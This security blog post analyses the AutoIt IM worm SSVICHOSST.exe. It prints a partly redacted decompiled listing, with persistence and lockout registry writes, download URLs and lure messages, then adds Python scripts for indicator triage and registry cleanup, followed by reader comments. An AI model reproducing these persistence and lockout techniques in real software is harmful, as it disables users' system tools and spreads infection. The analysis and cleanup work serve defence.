File name: SSVICHOSST.exe
Detection name: IM-Worm.Win32.Sohanad.t
The worm was written in AutoIt and compiled with Aut2Exe (version 3.2.2.0, as the header of the listing shows).
It was decompiled with Exe2Aut v3, a decompiler for AutoIt executables.
I don't know whether anyone else has done this or not, but here is the decompiled program. The parts that do the actual damage have been cut out and replaced with "virus code deleted" markers:
*******************
*******************
; <AUT2EXE VERSION: 3.2.2.0>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
; ----------------------------------------------------------------------------
;Written by Nhatquanglan
;contact nhatquanglan@gmail.com
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
; ----------------------------------------------------------------------------
; Include Version:1.59 (04/20/2006)
; ----------------------------------------------------------------------------
;
; AutoIt Version: 3.0
; Language: English
; Description: Functions that assist with process management.
;
; ----------------------------------------------------------------------------
;===============================================================================
; Description - Returns a string containing the process name that
; belongs to a given PID.
; Syntax - _ProcessGetName( $iPID )
; Parameters - $iPID - The PID of a currently running process
; Requirements - None.
; Return Values - Success - The name of the process
; Failure - Blank string and sets @error
; 1 - Process doesn't exist
; 2 - Error getting process list
; 3 - No processes found
; Author(s) - Erifash <erifash [at] gmail [dot] com>, Wouter van Kesteren.
; Notes - Supplementary to ProcessExists().
;===============================================================================
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
;===============================================================================
; Function Name: _ProcessGetPriority()
; Description: Get the priority of an open process
; Parameter(s): $vProcess - PID or name of a process.
; Requirement(s): AutoIt Beta v3.1.1.61+
; kernel32.dll (included with Windows)
; Return Value(s): On Success - Returns integer corresponding to
; the process's priority:
; 0 - Idle/Low
; 1 - Below Normal (Not supported on Windows 95/98/ME)
; 2 - Normal
; 3 - Above Normal (Not supported on Windows 95/98/ME)
; 4 - High
; 5 - Realtime
; On Failure: Returns -1 and sets @Error to 1
; Author(s): Matthew Tucker
; Valik added Pid or Processname logic
;===============================================================================
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
;===============================================================================
; Description: Executes a DOS command in a hidden command window.
; Syntax: _RunDOS( $sCommand )
; Parameter(s): $sCommand - Command to execute
; Requirement(s): None
; Return Value(s): On Success - Returns the exit code of the command
; On Failure - Depends on RunErrorsFatal setting
; Author(s): Jeremy Landes <jlandes at landeserve dot com>
; Note(s): None
;
;===============================================================================
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
; ----------------------------------------------------------------------------
#NoTrayIcon
$name = "SSVICHOSST"
$setting = "setting"
$ini = ".ini"
$nql = ".nql"
$xls = ".xls"
$exe = ".exe"
$toigioupdate = @HOUR + 2
$toigio = @MIN + 30
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe " & $name & $exe)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yahoo Messengger", "REG_SZ", @SystemDir & "\" & $name & $exe)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 1)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 1)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule", "AtTaskMaxHours", "REG_DWORD", 0)
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared")
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
Func downloadurl()
$settingurl = "http://nhatquanglan3.t35.com"
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
$downloaded = "success"
$settingurl1 = "http://nhatquanglan4.t35.com"
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
$myweb = "http://nhatquanglan1.0catch.com"
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
$tin[1] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[2] = IniRead (@SystemDir & "\" & $setting & $ini, "setting", "tin[2]", "")
If $tin[2] = "" Then
$tin[2] = "Vao day nghe bai nay di ban " & $myweb & " "
EndIf
$tin[3] = IniRead (@SystemDir & "\" & $setting & $ini, "setting", "tin[3]", "")
If $tin[3] = "" Then
$tin[3] = "Biet tin gi chua, vao day coi di " & $myweb & " "
EndIf
$tin[4] = IniRead (@SystemDir & "\" & $setting & $ini, "setting", "tin[4]", "")
If $tin[4] = "" Then
$tin[4] = "Trang Web nay coi cung hay, vao coi thu di " & $myweb & " "
EndIf
$tin[5] = IniRead (@SystemDir & "\" & $setting & $ini, "setting", "tin[5]", "")
If $tin[5] = "" Then
$tin[5] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? " & $myweb & " "
EndIf
$tin[6] = IniRead (@SystemDir & "\" & $setting & $ini, "setting", "tin[6]", "")
If $tin[6] = "" Then
$tin[6] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $myweb & " "
EndIf
$tin[7] = IniRead (@SystemDir & "\" & $setting & $ini, "setting", "tin[7]", "")
If $tin[7] = "" Then
$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $myweb & " "
EndIf
$tin[8] = IniRead (@SystemDir & "\" & $setting & $ini, "setting", "tin[8]", "")
If $tin[8] = "" Then
$tin[8] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $myweb & " "
EndIf
$tin[9] = IniRead (@SystemDir & "\" & $setting & $ini, "setting", "tin[9]", "")
If $tin[9] = "" Then
$tin[9] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $myweb & " "
EndIf
$tieude = WinGetTitle("Yahoo! Messenger", "")
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
If WinExists ("Bkav2006") Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
If WinExists ("System Configuration") Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
If WinExists ("Registry") Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
If WinExists ("Windows Task") Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
If WinExists ("[FireLion]") Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
If ProcessExists ("cmd.exe") Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", $i)
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxx
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
; ----------------------------------------------------------------------------
*******************
*******************
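Before going through the observations, here is a small triage script that pulls the indicators a responder cares about straight out of a decompiled AutoIt listing like the one above: every RegWrite with its key, value name and data, the URLs, and the window titles and process names the worm polls for. It also flags the registry writes that give the worm persistence (the Winlogon Shell and Run entries) and the policy values that lock the user out of Task Manager, Regedit and Folder Options. This is an added example written for this post, not code from the original page or from the worm; the SAMPLE text is a constructed excerpt modelled on the redacted listing, and the helper names (triage, PERSISTENCE_RULES) are my own.

```python
import re

# Constructed excerpt modelled on the redacted listing above (the real sample
# has more code between these lines). Straight quotes so the regexes match.
SAMPLE = r'''
#NoTrayIcon
$name = "SSVICHOSST"
$exe = ".exe"
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ","Explorer.exe " & $name & $exe)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","REG_SZ",@SystemDir & "\" & $name & $exe)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NofolderOptions","REG_DWORD",1)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD",1)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD",1)
RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule","AtTaskMaxHours","REG_DWORD",0)
$settingurl="http://nhatquanglan3.t35.com"
$myweb = "http://nhatquanglan1.0catch.com"
If WinExists ("Bkav2006") Then
If WinExists ("Registry") Then
If ProcessExists ("cmd.exe") then
'''

# RegWrite(key, value, type, data): the data argument is kept as the raw AutoIt
# expression (e.g. @SystemDir & "\" & $name & $exe) rather than evaluated.
REGWRITE_RE = re.compile(
    r'RegWrite\s*\(\s*"([^"]+)"\s*,\s*"([^"]*)"\s*,\s*"([^"]+)"\s*,\s*(.*?)\)\s*$',
    re.IGNORECASE | re.MULTILINE)
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
WINEXISTS_RE = re.compile(r'WinExists\s*\(\s*"([^"]+)"', re.IGNORECASE)
PROCEXISTS_RE = re.compile(r'ProcessExists\s*\(\s*"([^"]+)"', re.IGNORECASE)

# (substring of the lower-cased key, value name or None for any value, meaning)
PERSISTENCE_RULES = [
    (r"currentversion\winlogon", "shell",
     "Winlogon Shell hijack: the worm starts together with Explorer at every logon"),
    (r"currentversion\run", None, "Run key autostart"),
    (r"policies\system", "disabletaskmgr", "Task Manager disabled"),
    (r"policies\system", "disableregistrytools", "Registry Editor disabled"),
    (r"policies\explorer", "nofolderoptions", "Folder Options menu hidden"),
]


def triage(source: str) -> dict:
    """Extract registry writes, URLs and window/process checks from AutoIt source."""
    regwrites = [
        {"key": k, "value": v, "type": t, "data": d.strip()}
        for k, v, t, d in REGWRITE_RE.findall(source)
    ]
    flags = []
    for rw in regwrites:
        key_l, val_l = rw["key"].lower(), rw["value"].lower()
        for key_sub, val_name, why in PERSISTENCE_RULES:
            if key_sub in key_l and (val_name is None or val_name == val_l):
                flags.append(f"{rw['key']}\\{rw['value']}: {why}")
    return {
        "regwrites": regwrites,
        "flags": flags,
        "urls": sorted(set(URL_RE.findall(source))),
        "window_checks": WINEXISTS_RE.findall(source),   # windows it polls for
        "process_checks": PROCEXISTS_RE.findall(source),  # processes it polls for
    }


if __name__ == "__main__":
    for section, items in triage(SAMPLE).items():
        print(section)
        for item in items:
            print("   ", item)
```

Run it on the full decompiled text and the "flags" list is your cleanup checklist; the "window_checks" list tells you which tools (here the Bkav2006 scanner, Regedit, Task Manager, msconfig) the worm is watching for, so any cleanup should be done from Safe Mode or another boot environment where it is not running. The AtTaskMaxHours write is deliberately left unflagged: the rule table covers only autostart and lockdown values.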
OBSERVATIONS:
-------------
Here you can clearly see:
#; <AUT2EXE INCLUDE-START: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
>"phuong anh" is the Windows user profile the script was compiled under, so it is probably the name of the virus writer.
#;Written by Nhatquanglan
>Probably his nickname, or something else.
#;contact nhatquanglan@gmail.com
>His email id, though of course you can't be sure of it.
#"http://nhatquanglan3.t35.com"
#"http://nhatquanglan4.t35.com"
#"http://nhatquanglan1.0catch.com"
>His websites. The first two are the $settingurl values used in downloadurl(); the third is $myweb, which is appended to every message the worm sends.
#
E may, vao day coi co con nho nay ngon lam
Vao day nghe bai nay di ban
Vao day nghe bai nay di ban
Biet tin gi chua, vao day coi di
Trang Web nay coi cung hay, vao coi thu di
Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau?
Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa...
Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi...
Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo...
Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon...
>The strings in the program: these are the chat messages ($tin[1] to $tin[9]) the worm sends over Yahoo! Messenger, each followed by $myweb. The short ones are lures (in English: "Hey, come here and look at this girl, she's hot", "Come here and listen to this song, friend", "Heard the news yet? Come and see", "This website is pretty good, come and try it"); the long ones are lyrics of Vietnamese love songs. They are only the built-in defaults: each one is first read from setting.ini in the system directory and the default is used only when that entry is empty, so the messages can be swapped out without recompiling.
#Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau?
#Biet tin gi chua, vao day coi di
>These match the spam messages sent through chat software by the Nhatquanglan virus and its many variants, such as SCVHSOT.exe, scvshosts.exe and SCVVHSOT.exe.
That means the Nhatquanglan variants are most probably written by the same person.
But the newer samples can't be decompiled, because he now compiles them with a "passphrase", the compile-time password option that Aut2Exe offered in these versions. Clever... unless you have the password, you can't decompile.
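The decompiled listing also tells you exactly what to check on a machine people in the comments below describe: the Winlogon Shell value, the "Yahoo Messengger" Run entry, and the three policy values. The script below parses a `reg export` of those keys, reports what the worm changed, and writes a .reg file that restores the Explorer shell and deletes the autostart and policy values (a `"name"=-` line in a .reg file deletes that value on import). This is an added example written for this post, not the post's own "heal" download or any code from the worm; SAMPLE_REG is a constructed snapshot made to look like an infected machine, the key and value names are taken from the listing above, and the worm file names come from the post and its comments.

```python
import re

# Constructed Regedit 5.00 export of the keys the listing writes (not from a
# real machine). Regedit doubles backslashes inside REG_SZ data.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe SSVICHOSST.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Yahoo Messengger"="C:\\WINDOWS\\system32\\SSVICHOSST.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NofolderOptions"=dword:00000001
'''

WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
POLICY_VALUES = {
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System":
        ("DisableTaskMgr", "DisableRegistryTools"),
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer":
        ("NofolderOptions",),
}
# File names of this family mentioned in the post and its comments.
WORM_NAMES = ("ssvichosst", "scvhsot", "scvshosts", "scvvhsot")

VALUE_RE = re.compile(r'^"([^"]+)"=(?:"(.*)"|dword:([0-9a-fA-F]{8}))$')


def parse_reg(text):
    """Parse a Regedit 5.00 export into {key.lower(): {value_name: str | int}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()       # key paths are case-insensitive
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, s, d = m.groups()
            keys[current][name] = s.replace("\\\\", "\\") if s is not None else int(d, 16)
    return keys


def getv(vals, name):
    """Case-insensitive value lookup (registry value names are not case-sensitive)."""
    for n, v in vals.items():
        if n.lower() == name.lower():
            return v
    return None


def check(keys):
    """Return (findings, remediation): a list of what the worm changed and the
    text of a .reg file that undoes it."""
    findings, fix = [], ["Windows Registry Editor Version 5.00", ""]

    shell = getv(keys.get(WINLOGON.lower(), {}), "Shell") or "Explorer.exe"
    if shell.strip().lower() != "explorer.exe":
        findings.append(f"Winlogon Shell is {shell!r}, expected 'Explorer.exe'")
        fix += [f"[{WINLOGON}]", '"Shell"="Explorer.exe"', ""]

    run = keys.get(RUN_KEY.lower(), {})
    bad = [n for n, v in run.items()
           if isinstance(v, str) and any(w in v.lower() for w in WORM_NAMES)]
    for n in bad:
        findings.append(f"Run autostart {n!r} -> {run[n]}")
    if bad:
        fix += [f"[{RUN_KEY}]"] + [f'"{n}"=-' for n in bad] + [""]   # "name"=- deletes

    for key, names in POLICY_VALUES.items():
        hits = [n for n in names if getv(keys.get(key.lower(), {}), n) == 1]
        for n in hits:
            findings.append(f"{n}=1 under {key}")
        if hits:
            fix += [f"[{key}]"] + [f'"{n}"=-' for n in hits] + [""]

    return findings, "\n".join(fix)


if __name__ == "__main__":
    found, reg_text = check(parse_reg(SAMPLE_REG))
    for f in found:
        print("FOUND:", f)
    print(reg_text)
```

Kill the SSVICHOSST.exe process and delete the file from the system directory before importing the generated .reg, and import the .reg even if the file is already gone: a Run or Winlogon entry that still points at a deleted file is what produces a "cannot find the file" message at every logon. Running check() on its own output returns no findings, which is a cheap way to confirm the fix file is complete.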
23 December, 2007 at 4:34 pm
Suffering from this virus, can you help?
23 December, 2007 at 8:03 pm
My system is affected by the ssvichosst.exe virus. I am using the Win98 OS.
23 December, 2007 at 8:18 pm
GURPREET
VENKATMANI
Visit this page for the manual solution
http://piyushlabs.wordpress.com/ssvichosst/
and download and run the heal from here
http://piyushlabs.wordpress.com/downloads/
6 February, 2008 at 8:07 pm
It not only spams chatting software... but I got a version which spams the command lines of many of my programs like AutoCAD and 3ds Max and causes Photoshop to shut down..... Is it a new manifestation?
7 February, 2008 at 3:08 pm
GURJEET
Yup, maybe a new nhatquanglan variant,
and they can affect any program.
Can you mail me that particular virus (exe file),
if you can get it?
29 February, 2008 at 12:36 am
Hi... I am Vicky. My system was affected with
ssvichosst.exe and I was using AVG Anti-Spyware.
The virus was detected & deleted but still my system booting is slow and a search result of not finding
the file always appears every time I switch on
the system... Did the deletion of the file cause any
trouble? Please help....
3 March, 2008 at 7:49 pm
Vicky
What does the error look like? Can you send me a screenshot?
Try my heal for ssvichosst.
18 March, 2008 at 12:26 pm
My system is already affected by it. Need a simple
downloadable solution. Tried Trend Micro scan lp$vpn163 but
1 April, 2008 at 9:28 pm
Bro, can you send me the whole decrypted virus? I have that virus but it's an upgraded version, I think, so decompiling without the passphrase will not work.
13 May, 2008 at 11:01 am
Thank you for the help.
25 May, 2008 at 6:37 pm
Thank you very much.... your download worked for me.
Thank you.... I would be glad if you could find a solution against a virus named blok.exe and a trojan named... planet[1], planet[2] and so on... many times they travel in conjunction with ssvichosst.exe
25 October, 2008 at 4:03 pm
Hey, if you can, email me the passphrase to decompile the virus.
I'm studying programming, please help me.
I like this virus script, please accept my favour.
OR if you can, email me the .au3 script please.
18 March, 2009 at 2:18 pm
Hi Piyush.
My PC has a new variant of this ssvichosst. Your downloadable solution is not working on this one.
What to do? If you tell me what file to send you, I will mail it to you.
Thanks.
25 May, 2009 at 11:27 pm
Sir,
I would like to learn how to program that virus and the solution to it.
1 July, 2009 at 2:57 pm
Hi,
Can you tell us how to get the code out of an AutoIt 3 executable? Can you unpack other packed files that use version 3.2.2.0? Thanks!
4 October, 2009 at 4:40 pm
Hi, when I start up the laptop, I get a tab which is named vse432 Properties. And then there's a cycle of non-stop "Windows Explorer has stopped working" errors... and everything else errors as well with the messages.
I was wondering if this is the virus infecting the system? I tried to run the patch but it's not working... I suspect the step which is not working is when I double click on the shortcut.
Can you please advise? :\